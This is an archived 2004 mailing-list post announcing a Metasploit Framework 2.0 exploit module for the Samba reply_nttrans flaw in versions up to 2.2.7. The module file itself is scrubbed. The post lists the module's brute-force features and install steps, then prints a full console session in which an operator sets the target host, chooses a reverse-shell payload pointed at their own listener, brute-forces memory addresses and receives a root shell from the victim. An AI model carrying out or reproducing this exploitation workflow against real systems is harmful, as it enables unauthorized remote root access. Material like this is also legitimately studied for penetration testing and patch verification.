Metasploit Samba reply_nttrans Module [OLD]

[hdm at metasploit.com (H D Moore)]

Attached is an exploit module for version 2.0 of the Metasploit 
Framework. This module was based on Flatline's sambash.c exploit and 
includes some interesting improvements:

- Smaller step size and multiple connections for reliable brute force
- Should work against any Samba <= 2.2.7 Linux installation
- Displays a time estimate when using the larger brute force methods
- Tested against a handful of versions between 2.0.1 and 2.2.7
- The only public *working* Samba 2.0.x exploit I know of  [1]

If the target system is running version 2.2 of Samba, you are still better 
off using the trans2open module instead. This was written to fill a gap 
and allow exploitation of older Samba installations. 

To use this module, copy the attached file into the "exploits" 
subdirectory of the Metasploit Framework 2.0 installation. Win32 users 
should copy this file into $BASE\home\framework-2.0\exploits, where $BASE 
is where you installed the Framework.

If for some reason you don't have the Metasploit Framework installed, grab 
it from the following URL:

http://metasploit.com/projects/Framework/

We are estimating that version 2.1 will be ready for release in early 
June. It will consist of mostly bug fixes, with only a few new exploits 
and payloads. Version 2.2 should be available sometime around August and 
will include dramatic improvments to the user interfaces, the core 
modules, and contain a ton of new functionality. Thank you to everyone 
who has been providing bug reports and suggestions for new features!

Cheers,

-HD

1. To clarify, it is the only exploit I know of that can reliable pop a 
shell on systems running the 2.0 series. Some of the other 
vulnerabilities discovered in the 2.2 tree also apply, but nobody had 
written code for them. The 2.0 series is all over the place still, until 
recently it was still being used by VMWare to provide access to the host 
filesystem, not to mention all those cheesy linux appliances and storage 
solutions...

msf samba_nttrans > set RHOST 192.168.1.207
RHOST -> 192.168.1.207
msf samba_nttrans > set PAYLOAD linx86reverse_xor
PAYLOAD -> linx86reverse_xor
msf samba_nttrans(linx86reverse_xor) > set XKEY 99
XKEY -> 99
msf samba_nttrans(linx86reverse_xor) > set LHOST 192.168.1.244
LHOST -> 192.168.1.244
msf samba_nttrans(linx86reverse_xor) > set LPORT 4321
LPORT -> 4321
msf samba_nttrans(linx86reverse_xor) > show targets

Supported Exploit Targets
=========================

   0  Samba Complete Brute Force
   1  Samba 2.0 Brute Force
   2  Samba 2.2 Brute Force
   3  Samba 2.0.7 / Red Hat 7.0
   4  Samba 2.2.1 / Red Hat 7.2
   5  Samba 2.2.5 / Red Hat 8.0

msf samba_nttrans(linx86reverse_xor) > set TARGET 2
TARGET -> 2
msf samba_nttrans(linx86reverse_xor) > exploit
[*] Starting Reverse Handler.
[*] Starting attack against target Samba 2.2 Brute Force
[*] Attack will use 30 threads with 819 total attempts

[*] Brute force should complete in approximately 8.3 minutes
[*] Establishing 50 connection(s) to the target...
[*] --- Setting up the SMB session...
[*] --- Establishing tree connection...
[*] --- Sending first nttrans component...
[*] --- Completed range 0x08229280:0x08215a00

[ ... ]

[*] Brute force should complete in approximately 7.8 minutes
[*] Establishing 50 connection(s) to the target...
[*] --- Setting up the SMB session...
[*] --- Establishing tree connection...
[*] --- Sending first nttrans component...
[*] Got connection from 192.168.1.207:1120

sh: no job control in this shell
sh-2.05#
-------------- next part --------------
A non-text attachment was scrubbed...
Name: samba_nttrans.pm
Type: application/x-perl-module
Size: 9597 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20040523/bcaccc76/attachment.bin>